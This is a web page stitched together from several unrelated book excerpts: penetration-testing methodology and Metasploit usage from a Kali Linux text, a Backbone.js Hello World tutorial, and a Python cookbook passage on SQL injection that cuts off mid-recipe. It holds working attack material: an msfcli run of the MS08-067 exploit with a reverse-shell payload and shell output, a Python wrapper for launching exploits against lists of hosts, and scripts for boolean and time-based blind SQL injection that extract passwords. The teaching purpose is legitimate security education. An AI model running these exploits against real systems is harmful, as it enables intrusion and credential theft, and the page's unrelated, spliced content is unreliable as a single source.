The black-box approach is also known as external testing. While applying this approach, the security auditor assesses the network infrastructure from a remote location and is not aware of any internal technologies deployed by the organization concerned. By employing a number of real-world hacker techniques and following organized test phases, it may reveal known and unknown sets of vulnerabilities which may otherwise exist on the network. An auditor dealing with black-box testing is also known as a black-hat. It is important for an auditor to understand and classify these vulnerabilities according to their level of risk (low, medium, or high). The risk in general can be measured according to the threat imposed by the vulnerability and the financial loss that would occur following a successful penetration. An ideal penetration tester would track down any possible information that could lead him to compromise his target. Once the test process is completed, a report is generated with all the necessary information regarding the target security assessment, categorizing and translating the identified risks into a business context.

White-box testing

The white-box approach is also referred to as internal testing. An auditor involved in this kind of penetration testing process should be aware of all the internal and underlying technologies used by the target environment. Hence, it opens a wide gate for an auditor to view and critically evaluate the security vulnerabilities with the minimum possible effort.
An auditor engaged with white-box testing is also known as a white-hat. It brings more value to the organization compared to the black-box approach in the sense that it will eliminate any internal security issues lying in the target infrastructure environment, thus making it harder for a malicious adversary to infiltrate from the outside. The number of steps involved in white-box testing is similar to that of black-box testing, except that the target scoping, information gathering, and identification phases can be excluded. Moreover, the white-box approach can easily be integrated into a regular development lifecycle to eradicate any possible security issues at an early stage, before they get disclosed and exploited by intruders. The time and cost required to find and resolve security vulnerabilities is comparatively less than with the black-box approach.

The combination of both types of penetration testing provides a powerful insight into internal and external security viewpoints. This combination is known as grey-box testing, and the auditor engaged with grey-box testing is also known as a grey-hat. The key benefit of devising and practicing a grey-box approach is the set of advantages posed by both of the approaches mentioned earlier. However, it does require an auditor with limited knowledge of an internal system to choose the best way to assess its overall security. On the other hand, the external testing scenarios geared by the grey-box approach are similar to those of the black-box approach itself, but can help in making better decisions and test choices because the auditor is informed and aware of the underlying technology.

Vulnerability assessment versus penetration testing

Since the exponential growth of the IT security industry, there has always been a wide divergence in understanding and practicing the correct terminology for security assessment. This involves commercial-grade companies and non-commercial organizations that often misinterpret these terms when contracting for a specific type of security assessment. For this obvious reason, we decided to include a brief description of vulnerability assessment and differentiate its core features from penetration testing.

Vulnerability assessment is a process for assessing the internal and external security controls by identifying the threats that pose serious exposure to the organization's assets. This technical infrastructure evaluation not only points out the risks in the existing defenses but also recommends and prioritizes the remediation strategies. The internal vulnerability assessment provides assurance for securing the internal systems, while the external vulnerability assessment demonstrates the security of the perimeter defenses. In both testing criteria, each asset on the network is rigorously tested against multiple attack vectors to identify unattended threats and quantify the reactive measures. Depending on the type of assessment being carried out, a unique set of testing processes, tools, and techniques is followed to detect and identify vulnerabilities in the information assets in an automated fashion. This can be achieved by using an integrated vulnerability management platform that manages an up-to-date vulnerability database and is capable of testing different types of network devices while maintaining the integrity of configuration and change management.
A key difference between vulnerability assessment and penetration testing is that penetration testing goes beyond the level of identifying vulnerabilities and hooks into the process of exploitation, privilege escalation, and maintaining access to the target system. On the other hand, vulnerability assessment provides a broad view of any existing flaws in the system without measuring the impact of these flaws on the system under consideration. Another major difference between these two terms is that penetration testing is considerably more intrusive than vulnerability assessment and aggressively applies all the technical methods to exploit the live production environment. The vulnerability assessment process, however, carefully identifies and quantifies all the vulnerabilities in a non-invasive manner.

Parts of the industry, when dealing with both of these assessment types, confuse the terms and use them interchangeably, which is simply wrong. A qualified consultant always works out the best type of assessment based on the client's business requirements rather than misleading them towards one over the other. It is also the duty of the contracting party to look into the core details of the selected security assessment program before taking any final decision. Penetration testing is an expensive service when compared to vulnerability assessment.

Security testing methodologies

Various open source methodologies have been introduced to address security assessment needs. Using these assessment methodologies, one can more easily handle the time-critical and challenging task of assessing system security, depending on its size and complexity. Some of these methodologies focus on the technical aspect of security testing, while others focus on managerial criteria, and very few address both sides. The basic idea behind formalizing these methodologies with your assessment is to execute different types of tests step by step in order to judge the security of a system accurately. Therefore, we have introduced four such well-known security assessment methodologies to provide an extended view of assessing network and application security by highlighting their key features and benefits. These include:

Open Source Security Testing Methodology Manual (OSSTMM)
Information Systems Security Assessment Framework (ISSAF)
Open Web Application Security Project (OWASP) Top Ten
Web Application Security Consortium Threat Classification (WASC-TC)

All of these testing frameworks and methodologies will assist security professionals in choosing the best strategy that fits their client's requirements and in qualifying a suitable testing prototype. The first two provide general guidelines and methods for the security testing of almost any information asset. The last two mainly deal with the assessment of the application security domain. It is, however, important to note that security in itself is an ongoing process. Any minor change in the target environment can affect the whole process of security testing and may introduce errors in the final results. Thus, before implementing any of the above testing methods, the integrity of the target environment should be assured. Additionally, adopting any single methodology does not necessarily provide a complete picture of the risk assessment process.
Hence, it is left up to the security auditor to select the best strategy that can address the target testing criteria and remains consistent with its network or application environment. There are many security testing methodologies which claim to be perfect in finding all security issues, but choosing the best one still requires a careful selection process under which one can determine the accountability, cost, and effectiveness of the assessment at optimum level. Thus, determining the right assessment strategy depends on several factors, including the technical details provided about the target environment, resource availability, PenTester's knowledge, business objectives, and regulatory concerns. From a business standpoint, investing blind capital and serving unwanted resources to a security testing process can put the whole business economy in danger. Open Source Security Testing Methodology Manual (OSSTMM) The OSSTMM is a recognized international standard for security testing and analysis and is being used by many organizations in their day-to-day assessment cycle. It is purely based on scientific method which assists in quantifying the operational security and its cost requirements in concern with the business objectives. From a technical perspective, its methodology is divided into four key groups, that is, Scope, Channel, Index, and Vector. The scope defines a process of collecting information on all assets operating in the target environment. A channel determines the type of communication and interaction with these assets, which can be physical, spectrum, and communication. All of these channels depict a unique set of security components that has to be tested and verified during the assessment period. These components comprise of physical security, human psychology, data networks, wireless communication medium, and telecommunication. The index is a method which is considerably useful while classifying these target assets corresponding to their particular identifications, such as, MAC Address, and IP Address. At the end, a vector concludes the direction by which an auditor can assess and analyze each functional asset. This whole process initiates a technical roadmap towards evaluating the target environment thoroughly and is known as Audit Scope. There are different forms of security testing which have been classified under OSSTMM methodology and their organization is presented within six standard security test types: Blind: The blind testing does not require any prior knowledge about the target system. But the target is informed before the execution of an audit scope. Ethical hacking and war gaming are examples of blind type testing. This kind of testing is also widely accepted because of its ethical vision of informing a target in advance. Double blind: In double blind testing, an auditor does not require any knowledge about the target system nor is the target informed before the test execution. Black-box auditing and penetration testing are examples of double blind testing. Most of the security assessments today are carried out using this strategy, thus, putting a real challenge for auditors to select the best of breed tools and techniques in order to achieve their required goal. Gray box: In gray box testing, an auditor holds limited knowledge about the target system and the target is also informed before the test is executed. Vulnerability assessment is one of the basic examples of gray box testing. 
Double gray box: The double gray box testing works in a similar way to gray box testing, except the time frame for an audit is defined and there are no channels and vectors being tested. White-box audit is an example of double gray box testing. Tandem: In tandem testing, the auditor holds minimum knowledge to assess the target system and the target is also notified in advance before the test is executed. It is fairly noted that the tandem testing is conducted thoroughly. Crystal box and in-house audit are examples of tandem testing. Reversal: In reversal testing, an auditor holds full knowledge about the target system and the target will never be informed of how and when the test will be conducted. Red-teaming is an example of reversal type testing. Which OSSTMM test type follows the rules of Penetration Testing? Double blind testing The technical assessment framework provided by OSSTMM is flexible and capable of deriving certain test cases which are logically divided into five security components of three consecutive channels, as mentioned previously. These test cases generally examine the target by assessing its access control security, process security, data controls, physical location, perimeter protection, security awareness level, trust level, fraud control protection, and many other procedures. The overall testing procedures focus on what has to be tested, how it should be tested, what tactics should be applied before, during and after the test, and how to interpret and correlate the final results. Capturing the current state of protection of a target system by using security metrics is considerably useful and invaluable. Thus, the OSSTMM methodology has introduced this terminology in the form of RAV (Risk Assessment Values). The basic function of RAV is to analyze the test results and compute the actual security value based on three factors, which are operational security, loss controls, and limitations. This final security value is known as RAV Score. By using RAV score an auditor can easily extract and define the milestones based on the current security posture to accomplish better protection. From a business perspective, RAV can optimize the amount of investment required on security and may help in the justification of better available solutions. Key features and benefits Practicing the OSSTMM methodology substantially reduces the occurrence of false negatives and false positives and provides accurate measurement for the security. Its framework is adaptable to many types of security tests, such as penetration testing, white-box audit, vulnerability assessment, and so forth. It ensures the assessment should be carried out thoroughly and that of the results can be aggregated into consistent, quantifiable, and reliable manner. The methodology itself follows a process of four individually connected phases, namely definition phase, information phase, regulatory phase, and controls test phase. Each of which obtain, assess, and verify the information regarding the target environment. Evaluating security metrics can be achieved using the RAV method. The RAV calculates the actual security value based on operational security, loss controls, and limitations. The given output known as the RAV score represents the current state of target security. Formalizing the assessment report using the Security Test Audit Report (STAR) template can be advantageous to management, as well as the technical team to review the testing objectives, risk assessment values, and the output from each test phase. 
The methodology is regularly updated with new trends of security testing, regulations, and ethical concerns. The OSSTMM process can easily be coordinated with industry regulations, business policy, and government legislations. Additionally, a certified audit can also be eligible for accreditation from ISECOM (Institute for Security and Open Methodologies) directly.
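The Scope and Index concepts described earlier amount to building an inventory of target assets keyed by identifiers such as IP and MAC addresses. The following rough sketch shows one way to start such an index with Nmap; the address range is a placeholder, MAC discovery requires root privileges on a directly connected subnet, and the script itself is an illustration rather than part of the OSSTMM.

#!/usr/bin/env bash
# Ping-sweep the target range and keep the IP and MAC lines as a starting asset index.
sudo nmap -sn 192.168.0.0/24 -oN ping-sweep.txt
grep -E "Nmap scan report|MAC Address" ping-sweep.txt > asset-index.txt
cat asset-index.txt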

article-image-target-exploitation

Target Exploitation

Packt
14 Mar 2014
14 min read
(For more resources related to this topic, see here.) Vulnerability research Understanding the capabilities of a specific software or hardware product may provide a starting point for investigating vulnerabilities that could exist in that product. Conducting vulnerability research is not easy, neither is it a one-click task. Thus, it requires a strong knowledge base with different factors to carry out security analysis. The following are the factors to carry out security analysis: Programming skills: This is a fundamental factor for ethical hackers. Learning the basic concepts and structures that exist with any programming language should grant the tester with an imperative advantage of finding vulnerabilities. Apart from the basic knowledge of programming languages, you must be prepared to deal with the advanced concepts of processors, system memory, buffers, pointers, data types, registers, and cache. These concepts are implementable in almost any programming language such as C/C++, Python, Perl, and Assembly. To learn the basics of writing an exploit code from a discovered vulnerability, please visit http://www.phreedom.org/presentations/exploit-code-development/. Reverse engineering: This is another wide area for discovering the vulnerabilities that could exist in the electronic device, software, or system by analyzing its functions, structures, and operations. The purpose is to deduce a code from a given system without any prior knowledge of its internal working, to examine it for error conditions, poorly designed functions, and protocols, and to test the boundary conditions. There are several reasons that inspire the practice of reverse engineering skills such as the removal of copyright protection from a software, security auditing, competitive technical intelligence, identification of patent infringement, interoperability, understanding the product workflow, and acquiring the sensitive data. Reverse engineering adds two layers of concept to examine the code of an application: source code auditing and binary auditing. If you have access to the application source code, you can accomplish the security analysis through automated tools or manually study the source in order to extract the conditions where vulnerability can be triggered. On the other hand, binary auditing simplifies the task of reverse engineering where the application exists without any source code. Disassemblers and decompilers are two generic types of tools that may assist the auditor with binary analysis. Disassemblers generate the assembly code from a complied binary program, while decompilers generate a high-level language code from a compiled binary program. However, dealing with either of these tools is quite challenging and requires a careful assessment. Instrumented tools: Instrumented tools such as debuggers, data extractors, fuzzers, profilers, code coverage, flow analyzers, and memory monitors play an important role in the vulnerability discovery process and provide a consistent environment for testing purposes. Explaining each of these tool categories is out of the scope of this book. However, you may find several useful tools already present under Kali Linux. To keep a track of the latest reverse code engineering tools, we strongly recommend that you visit the online library at http://www.woodmann.com/collaborative/tools/index.php/Category:RCE_Tools. 
Exploitability and payload construction: This is the final step in writing the proof-of-concept (PoC) code for a vulnerable element of an application, which could allow the penetration tester to execute custom commands on the target machine. We apply our knowledge of vulnerable applications from the reverse engineering stage to polish shellcode with an encoding mechanism in order to avoid bad characters that may result in the termination of the exploit process. Depending on the type and classification of the vulnerability discovered, it is very significant to follow the specific strategy that may allow you to execute an arbitrary code or command on the target system. As a professional penetration tester, you may always be looking for loopholes that should result in getting shell access to your target operating system. Thus, we will demonstrate a few scenarios with the Metasploit framework, which will show these tools and techniques.

Vulnerability and exploit repositories

For many years, a number of vulnerabilities have been reported in the public domain. Some of these were disclosed with the PoC exploit code to prove the feasibility and viability of a vulnerability found in the specific software or application, and many still remain unaddressed. This competitive era of finding publicly available exploits and vulnerability information makes it easier for penetration testers to quickly search and retrieve the best available exploit that may suit their target system environment. You can also port one type of exploit to another type (for example, Win32 architecture to Linux architecture) provided that you hold intermediate programming skills and a clear understanding of OS-specific architecture. We have provided a combined set of online repositories that may help you to track down any vulnerability information or its exploit by searching through them. Not every single vulnerability found has been disclosed to the public on the Internet. Some are reported without any PoC exploit code, and some do not even provide detailed vulnerability information. For this reason, consulting more than one online resource is a proven practice among many security auditors. The following is a list of online repositories:

Bugtraq SecurityFocus: http://www.securityfocus.com
OSVDB Vulnerabilities: http://osvdb.org
Packet Storm: http://www.packetstormsecurity.org
VUPEN Security: http://www.vupen.com
National Vulnerability Database: http://nvd.nist.gov
ISS X-Force: http://xforce.iss.net
US-CERT Vulnerability Notes: http://www.kb.cert.org/vuls
US-CERT Alerts: http://www.us-cert.gov/cas/techalerts/
SecuriTeam: http://www.securiteam.com
Government Security Org: http://www.governmentsecurity.org
Secunia Advisories: http://secunia.com/advisories/historic/
Security Reason: http://securityreason.com
XSSed XSS-Vulnerabilities: http://www.xssed.com
Security Vulnerabilities Database: http://securityvulns.com
SEBUG: http://www.sebug.net
BugReport: http://www.bugreport.ir
MediaService Lab: http://lab.mediaservice.net
Intelligent Exploit Aggregation Network: http://www.intelligentexploit.com
Hack0wn: http://www.hack0wn.com

Although there are many other Internet resources available, we have listed only a few reviewed ones. Kali Linux comes with an integrated exploit database from Offensive Security. This provides the extra advantage of keeping all archived exploits up to date on your system for future reference and use.
To access Exploit-DB, execute the following commands on your shell:

# cd /usr/share/exploitdb/
# vim files.csv

This will open a complete list of the exploits currently available from Exploit-DB under the /usr/share/exploitdb/platforms/ directory. These exploits are categorized in their relevant subdirectories based on the type of system (Windows, Linux, HP-UX, Novell, Solaris, BSD, IRIX, TRU64, ASP, PHP, and so on). Most of these exploits were developed using C, Perl, Python, Ruby, PHP, and other programming technologies. Kali Linux already comes with a handy set of compilers and interpreters that support the execution of these exploits.

How do you extract particular information from the exploits list? Using the power of bash commands, you can manipulate the output of any text file in order to retrieve meaningful data. You can either use searchsploit, or this can also be accomplished by typing cat files.csv | grep '"' | cut -d";" -f3 on your console. It will extract the list of exploit titles from the files.csv file. To learn the basic shell commands, please refer to http://tldp.org/LDP/abs/html/index.html.

Advanced exploitation toolkit

Kali Linux is preloaded with some of the best and most advanced exploitation toolkits. The Metasploit framework (http://www.metasploit.com) is one of these. We have explained it in greater detail and presented a number of scenarios that will effectively increase productivity and enhance your experience with penetration testing. The framework was developed in the Ruby programming language and supports modularization, which makes it easier for a penetration tester with adequate programming skills to extend or develop custom plugins and tools. The architecture of the framework is divided into three broad categories: libraries, interfaces, and modules. A key part of our exercises is to focus on the capabilities of various interfaces and modules. Interfaces (console, CLI, web, and GUI) basically provide the front-end operational activity when dealing with any type of module (exploits, payloads, auxiliaries, encoders, and NOP). Each of the following modules has its own meaning and is function-specific to the penetration testing process:

Exploit: This module is the proof-of-concept code developed to take advantage of a particular vulnerability in a target system
Payload: This module is malicious code intended as part of an exploit, or independently compiled, to run arbitrary commands on the target system
Auxiliaries: These modules are a set of tools developed to perform scanning, sniffing, wardialing, fingerprinting, and other security assessment tasks
Encoders: These modules are provided to evade detection by antivirus, firewall, IDS/IPS, and other similar malware defenses by encoding the payload during a penetration operation
No Operation or No Operation Performed (NOP): This module is an assembly language instruction often added into a shellcode to perform nothing but cover a consistent payload space

For your understanding, we have explained the basic use of two well-known Metasploit interfaces with their relevant command-line options. Each interface has its own strengths and weaknesses. However, we strongly recommend that you stick to the console version as it supports most of the framework features.

MSFConsole

MSFConsole is one of the most efficient, powerful, and all-in-one centralized front-end interfaces for penetration testers to make the best use of the exploitation framework.
To access msfconsole, navigate to Applications | Kali Linux | Exploitation Tools | Metasploit | Metasploit framework or use the terminal to execute the following command:

# msfconsole

You will be dropped into an interactive console interface. To learn about all the available commands, you can type the following command:

msf > help

This will display two sets of commands; one set will be widely used across the framework, and the other will be specific to the database backend where the assessment parameters and results are stored. Instructions about other usage options can be retrieved through the use of -h, following the core command. Let us examine the use of the show command as follows:

msf > show -h
[*] Valid parameters for the "show" command are: all, encoders, nops, exploits, payloads, auxiliary, plugins, options
[*] Additional module-specific parameters are: advanced, evasion, targets, actions

This command is typically used to display the available modules of a given type or all of the modules. The most frequently used commands could be any of the following:

show auxiliary: This command will display all the auxiliary modules
show exploits: This command will get a list of all the exploits within the framework
show payloads: This command will retrieve a list of payloads for all platforms. However, using the same command in the context of a chosen exploit will display only compatible payloads. For instance, Windows payloads will only be displayed with the Windows-compatible exploits
show encoders: This command will print the list of available encoders
show nops: This command will display all the available NOP generators
show options: This command will display the settings and options available for the specific module
show targets: This command will help us to extract a list of target OS supported by a particular exploit module
show advanced: This command will provide you with more options to fine-tune your exploit execution

We have compiled a short list of the most valuable commands in the following list; you can practice each one of them with the Metasploit console. The italicized terms next to the commands will need to be provided by you:

check: To verify a particular exploit against your vulnerable target without exploiting it. This command is not supported by many exploits.
connect ip port: Works similar to that of the Netcat and Telnet tools.
exploit: To launch a selected exploit.
run: To launch a selected auxiliary.
jobs: Lists all the background modules currently running and provides the ability to terminate them.
route add subnet netmask sessionid: To add a route for the traffic through a compromised session for network pivoting purposes.
info module: Displays detailed information about a particular module (exploit, auxiliary, and so on).
set param value: To configure the parameter value within a current module.
setg param value: To set the parameter value globally across the framework to be used by all exploits and auxiliary modules.
unset param: It is a reverse of the set command. You can also reset all variables by using the unset all command at once.
unsetg param: To unset one or more global variables.
sessions: Ability to display, interact, and terminate the target sessions. Use with -l for listing, -i ID for interaction, and -k ID for termination.
search string: Provides a search facility through module names and descriptions.
use module: Select a particular module in the context of penetration testing.
It is important for you to understand their basic use with different sets of modules within the framework.

MSFCLI

Similar to the MSFConsole interface, a command-line interface (CLI) provides extensive coverage of various modules that can be launched at any one instance. However, it lacks some of the advanced automation features of MSFConsole. To access msfcli, use the terminal to execute the following command:

# msfcli -h

This will display all the available modes similar to those of MSFConsole, as well as usage instructions for selecting a particular module and setting its parameters. Note that all the variables or parameters should follow the convention of param=value and that all options are case-sensitive. We have presented a small exercise to select and execute a particular exploit as follows:

# msfcli windows/smb/ms08_067_netapi O
[*] Please wait while we load the module tree...

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

The use of O at the end of the preceding command instructs the framework to display the available options for the selected exploit. The following command sets the target IP using the RHOST parameter:

# msfcli windows/smb/ms08_067_netapi RHOST=192.168.0.7 P
[*] Please wait while we load the module tree...

Compatible payloads
===================

   Name                             Description
   ----                             -----------
   generic/debug_trap               Generate a debug trap in the target process
   generic/shell_bind_tcp           Listen for a connection and spawn a command shell
...

Finally, after setting the target IP using the RHOST parameter, it is time to select the compatible payload and execute our exploit as follows:

# msfcli windows/smb/ms08_067_netapi RHOST=192.168.0.7 LHOST=192.168.0.3 PAYLOAD=windows/shell/reverse_tcp E
[*] Please wait while we load the module tree...
[*] Started reverse handler on 192.168.0.3:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (240 bytes) to 192.168.0.7
[*] Command shell session 1 opened (192.168.0.3:4444 -> 192.168.0.7:1027)

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

As you can see, we have acquired local shell access to our target machine after setting the LHOST parameter for a chosen payload.
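If you find yourself repeating msfcli one-liners like the ones above, they are easy to wrap in a small script. The following Python sketch is illustrative only and is not part of the original text: it assumes msfcli is available on the PATH of your BackTrack/Kali system, and it reuses the example module, payload, and lab IP addresses shown above, which you would replace with your own values.

# Illustrative sketch: drive msfcli from Python using subprocess.
# msfcli expects: msfcli <module> <param=value> ... <mode>
import subprocess

def run_msfcli(module, options, mode="E"):
    cmd = ["msfcli", module]
    cmd += ["%s=%s" % (key, value) for key, value in options.items()]
    cmd.append(mode)
    print("[*] Running: " + " ".join(cmd))
    return subprocess.call(cmd)

if __name__ == "__main__":
    # Example values taken from the walkthrough above; adapt to your lab.
    run_msfcli(
        "windows/smb/ms08_067_netapi",
        {"RHOST": "192.168.0.7",
         "LHOST": "192.168.0.3",
         "PAYLOAD": "windows/shell/reverse_tcp"},
        mode="E",
    )

Using a wrapper like this, the same exploit can be launched against a list of candidate hosts from a loop, while the O and P modes can be used first to review options and compatible payloads.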

article-image-building-app-using-backbonejs
Packt
29 Jul 2013
7 min read
Save for later

Building an app using Backbone.js

Packt
29 Jul 2013
7 min read
(For more resources related to this topic, see here.) Building a Hello World app For building the app you will need the necessary script files and a project directory laid out. Let's begin writing some code. This code will require all scripts to be accessible; otherwise we'll see some error messages. We'll also go over the Web Inspector and use it to interact with our applications. Learning this tool is essential for any web application developer to proficiently debug (and even write new code for) their application. Step 1 – adding code to the document Add the following code to the index.html file. I'm assuming the use of LoDash and Zepto, so you'll want to update the code accordingly: <!DOCTYPE HTML> <html> <head> <title>Backbone Application Development Starter</title> <!-- Your Utility Library --> <script src ="scripts/lodash-1.3.1.js"></script> <!-- Your Selector Engine --> <script src ="scripts/zepto-1.0.js"></script> <script src ="scripts/backbone-1.0.0.js"></script> </head> <body> <div id="display"> <div class ="listing">Houston, we have a problem.</div> </div> </body> <script src ="scripts/main.js"></script> </html> This file will load all of our scripts and has a simple <div>, which displays some content. I have placed the loading of our main.js file after the closing <body> tag. This is just a personal preference of mine; it will ensure that the script is executed after the elements of the DOM have been populated. If you were to place it adjacent to the other scripts, you would need to encapsulate the contents of the script with a function call so that it gets run after the DOM has loaded; otherwise, when the script runs and tries to find the div#display element, it will fail. Step 2 – adding code to the main script Now, add the following code to your scripts/main.js file: var object = {};_.extend(object, Backbone.Events);object.on("show-message", function(msg) {$('#display .listing').text(msg);});object.trigger("show-message", "Hello World"); Allow me to break down the contents of main.js so that you know what each line does. var object = {}; The preceding line should be pretty obvious. We're just creating a new object, aptly named object, which contains no attributes. _.extend(object, Backbone.Events); The preceding line is where the magic starts to happen. The utility library provides us with many functions, one of which is extend. This function takes two or more objects as its arguments, copies the attributes from them, and appends them to the first object. You can think of this as sort of extending a class in a classical language (such as PHP). Using the extend utility function is the preferred way of adding Backbone functionality to your classes. In this case, our object is now a Backbone Event object, which means it can be used for triggering events and running callback functions when an event is triggered. By extending your objects in this manner, you have a common method for performing event-based actions in your code, without having to write one-off implementations. object.on("show-message", function(msg) {$('#display .listing').text(msg);}); The preceding code adds an event listener to our object. The first argument to the on function is the name of the event, in this case show-message. This is a simple string that describes the event you are listening for and will be used later for triggering the events. There isn't a requirement as far as naming conventions go, but try to be descriptive and consistent. 
The second argument is a callback function, which takes an argument that can be set at the time the event is triggered. The callback function here is pretty simple; it just queries the DOM using our selector engine and updates the text of the element to be the text passed into the e vent. object.trigger("show-message", "Hello World"); Finally, we trigger our event. Simply use the trigger function on the object, tell it that we are triggering the show-message event, and pass in the argument for the trigger callback as the second argument. Step 3 – opening the project in your browser This will show us the text Hello World when we open our index.html file in our browser. Don't believe me? Double click on the file now, and you should see the following screen: If Chrome isn't your default browser, you should be able to right-click on the file from within your file browser and there should be a way to choose which application to open the file with. Chrome should be in that list if it was installed properly. Step 4 – encountering a problem Do you see something other than our happy Hello World message? The code is set up in a way that it should display the message Houston , we have a problem if something were to go wrong (this text is what is displayed in the DOM by default, before having JavaScript run and replace it). The missing script file The first place to look for the problem is the Network tab of the Web Inspector. This tab shows us each of the files that were downloaded by the browser to satisfy the rendering of the page. Sometimes, the Console tab will also tell us when a file wasn't properly downloaded, but not always. The following screenshot explains this: If you look at the Network tab, you can see an item clearly marked in red ( backbone-1.0.0.js ). In my project folder, I had forgotten to download the Backbone library file, thus the browser wasn't able to load the file. Note that we are loading the file from the local filesystem, so the status column says either Success or Failure . If these files were being loaded from a real web server, you would see the actual HTTP status codes, such as 200 OK for a successful file download or 404 Not Found for a missing file. The script typo Perhaps you have made a typo in the script while copying it from the book. If you have any sort of issues resulting from incorrect JavaScript, they will be visible in the Console tab, as shown in the following screenshot: In my example, I had forgotten the line about extending my object with the Backbone events class. Having left out the extend line of code caused the object to be missing some functionality, specifically the method on(). Notice how the console displays which filename and line number the error is on. Feel free to remove and add code to the files and refresh the page to get a feel for what the errors look like in the console. This is a great way to get a feel for debugging Backbone-based (and, really, any JavaScript) applications. Summary In this article we learned how to develop an app using Backbone.js. Resources for Article : Further resources on this subject: JBoss Portals and AJAX - Part 1 [Article] Getting Started with Zombie.js [Article] DWR Java AJAX User Interface: Basic Elements (Part 1) [Article]
article-image-sql-injection
Packt
23 Jun 2015
11 min read
Save for later

SQL Injection

Packt
23 Jun 2015
11 min read
In this article by Cameron Buchanan, Terry Ip, Andrew Mabbitt, Benjamin May, and Dave Mound, authors of the book Python Web Penetration Testing Cookbook, we're going to create scripts that encode attack strings, perform attacks, and time normal actions to normalize attack times. (For more resources related to this topic, see here.)

Exploiting Boolean SQLi

There are times when all you can get from a page is a yes or no. It's heartbreaking until you realise that that's the SQL equivalent of saying "I LOVE YOU". All SQLi can be broken down into yes or no questions, dependent on how patient you are. We will create a script that takes a yes value and a URL, and returns results based on a predefined attack string. I have provided an example attack string, but this will change dependent on the system you are testing.

How to do it…

The following script is how yours should look:

import requests
import sys

yes = sys.argv[1]

i = 1
asciivalue = 1

answer = []
print "Kicking off the attempt"

payload = {'injection': '\'AND char_length(password) = '+str(i)+';#', 'Submit': 'submit'}

while True:
    req = requests.post('<target url>', data=payload)
    lengthtest = req.text
    if yes in lengthtest:
        length = i
        break
    else:
        i = i+1
        payload = {'injection': '\'AND char_length(password) = '+str(i)+';#', 'Submit': 'submit'}

for x in range(1, length + 1):
    while asciivalue < 126:
        payload = {'injection': '\'AND (substr(password, '+str(x)+', 1)) = '+ chr(asciivalue)+';#', 'Submit': 'submit'}
        req = requests.post('<target url>', data=payload)
        if yes in req.text:
            answer.append(chr(asciivalue))
            break
        else:
            asciivalue = asciivalue + 1
            pass
    asciivalue = 1
print "Recovered String: " + ''.join(answer)

How it works…

Firstly, the user must identify a string that only occurs when the SQLi is successful. Alternatively, the script may be altered to respond to the absence of proof of a failed SQLi. We provide this string as a sys.argv. We also create the two iterators we will use in this script and set them to 1, as MySQL starts counting from 1 instead of 0 like the failed system it is. We also create an empty list for our future answer and tell the user that the script is starting:

yes = sys.argv[1]

i = 1
asciivalue = 1
answer = []
print "Kicking off the attempt"

Our payload here basically requests the length of the password we are attempting to return and compares it to a value that will be iterated:

payload = {'injection': '\'AND char_length(password) = '+str(i)+';#', 'Submit': 'submit'}

We then repeat the next loop forever, as we have no idea how long the password is. We submit the payload to the target URL in a POST request:

while True:
    req = requests.post('<target url>', data=payload)

Each time, we check to see if the yes value we set originally is present in the response text and, if so, we end the while loop, setting the current value of i as the parameter length. The break command is the part that ends the while loop:

lengthtest = req.text
if yes in lengthtest:
    length = i
    break

If we don't detect the yes value, we add one to i, rebuild the payload with the new length guess, and continue the loop:

else:
    i = i+1
    payload = {'injection': '\'AND char_length(password) = '+str(i)+';#', 'Submit': 'submit'}

Using the identified length of the target string, we iterate through each character and, using its ascii value, each possible value of that character. For each value, we submit it to the target URL. Because the ascii table only runs up to 127, we cap the loop to run until the ascii value has reached 126.
If it reaches 127, something has gone wrong:

for x in range(1, length + 1):
    while asciivalue < 126:
        payload = {'injection': '\'AND (substr(password, '+str(x)+', 1)) = '+ chr(asciivalue)+';#', 'Submit': 'submit'}
        req = requests.post('<target url>', data=payload)

We check to see if our yes string is present in the response and, if so, break to go on to the next character. We append the successful character to our answer string in character form, converting it with the chr command:

if yes in req.text:
    answer.append(chr(asciivalue))
    break

If the yes value is not present, we add to the ascii value to move on to the next potential character for that position and pass:

else:
    asciivalue = asciivalue + 1
    pass

Finally, we reset the ascii value for each loop, and when the loop hits the length of the string, we finish, printing the whole recovered string:

asciivalue = 1
print "Recovered String: " + ''.join(answer)

There's more…

This script could potentially be altered to handle iterating through tables and recovering multiple values through better crafted SQL injection strings. Ultimately, this provides a base plate, as with the later Blind SQL Injection script, for developing more complicated and impressive scripts to handle challenging tasks. See the Blind SQL Injection script for an advanced implementation of these concepts.

Exploiting Blind SQL Injection

Sometimes life hands you lemons; Blind SQL Injection points are some of those lemons. You're reasonably sure you've found an SQL injection vulnerability, but there are no errors and you can't get it to return any data. In these situations, you can use timing commands within SQL to cause the page to pause in returning a response, and then use that timing to make judgements about the database and its data. We will create a script that makes requests to the server and receives differently timed responses dependent on the characters it's requesting. It will then read those times and reassemble strings.

How to do it…

The script is as follows:

import requests

times = []
print "Kicking off the attempt"
cookies = {'cookie name': 'Cookie value'}

payload = {'injection': '\'or sleep(char_length(password));#', 'Submit': 'submit'}
req = requests.post('<target url>', data=payload, cookies=cookies)
firstresponsetime = int(req.elapsed.total_seconds())

for x in range(1, firstresponsetime + 1):
    payload = {'injection': '\'or sleep(ord(substr(password, '+str(x)+', 1)));#', 'Submit': 'submit'}
    req = requests.post('<target url>', data=payload, cookies=cookies)
    responsetime = int(round(req.elapsed.total_seconds()))
    a = chr(responsetime)
    times.append(a)
    answer = ''.join(times)
print "Recovered String: " + answer

How it works…

As ever, we import the required libraries and declare the lists we need to fill later on. We also print a message stating that the script has indeed started, because with some time-based functions the user can be left waiting a while. In this script, I have also included cookies using the requests library, as it is likely for this sort of attack that authentication is required:

times = []
print "Kicking off the attempt"
cookies = {'cookie name': 'Cookie value'}

We set our payload up in a dictionary along with a submit button. The attack string is simple enough to understand with explanation. The initial tick has to be escaped to be treated as text within the dictionary. That tick breaks the SQL command initially and allows us to input our own SQL commands. Next, we say that in the event of the first command failing, the following command should be performed with OR.
We then tell the server to sleep one second for every character in the first row of the password column. Finally, we close the statement with a semi-colon and comment out any trailing characters with a hash (or pound if you're American and/or wrong):

payload = {'injection': '\'or sleep(char_length(password));#', 'Submit': 'submit'}

